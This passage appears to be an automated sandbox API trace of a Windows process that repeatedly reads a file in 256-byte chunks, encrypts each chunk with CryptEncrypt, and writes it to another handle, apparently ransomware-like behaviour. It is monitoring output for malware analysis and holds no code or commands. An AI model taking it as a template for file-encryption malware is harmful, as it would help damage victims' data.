lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.130] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.130] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.130] GetLastError () returned 0x0 [0172.130] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.130] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.130] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.130] GetLastError () returned 0x0 [0172.130] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.131] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.131] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.131] GetLastError () returned 0x0 [0172.131] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.131] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.131] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.131] GetLastError () returned 0x0 [0172.131] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.131] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.131] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.131] GetLastError () returned 0x0 [0172.131] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.131] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.131] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.131] GetLastError () returned 0x0 [0172.131] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.131] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.131] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.131] GetLastError () returned 0x0 [0172.131] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.131] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.131] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.132] GetLastError () returned 0x0 [0172.132] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.132] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.132] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.132] GetLastError () returned 0x0 [0172.132] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.132] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.132] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.132] GetLastError () returned 0x0 [0172.132] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.132] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.132] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.132] GetLastError () returned 0x0 [0172.132] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.132] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.132] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.132] GetLastError () returned 0x0 [0172.132] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.132] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.132] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.132] GetLastError () returned 0x0 [0172.132] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.132] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.132] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.132] GetLastError () returned 0x0 [0172.132] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.132] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.133] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.133] GetLastError () returned 0x0 [0172.133] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.133] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.133] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.133] GetLastError () returned 0x0 [0172.133] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.133] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.133] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.133] GetLastError () returned 0x0 [0172.133] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.133] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.133] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.133] GetLastError () returned 0x0 [0172.133] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.133] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.133] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.133] GetLastError () returned 0x0 [0172.133] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.133] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.133] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.133] GetLastError () returned 0x0 [0172.133] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.133] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.133] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.133] GetLastError () returned 0x0 [0172.134] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.134] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.134] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.134] GetLastError () returned 0x0 [0172.134] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.134] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.134] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.135] GetLastError () returned 0x0 [0172.135] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.136] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.136] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.137] GetLastError () returned 0x0 [0172.138] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.138] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.138] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.138] GetLastError () returned 0x0 [0172.138] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.138] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.139] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.139] GetLastError () returned 0x0 [0172.139] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.139] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.139] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.139] GetLastError () returned 0x0 [0172.139] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.139] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.139] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.139] GetLastError () returned 0x0 [0172.139] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.139] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.139] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.139] GetLastError () returned 0x0 [0172.139] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.139] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.139] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.139] GetLastError () returned 0x0 [0172.139] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.139] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.139] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.139] GetLastError () returned 0x0 [0172.139] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.139] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.139] 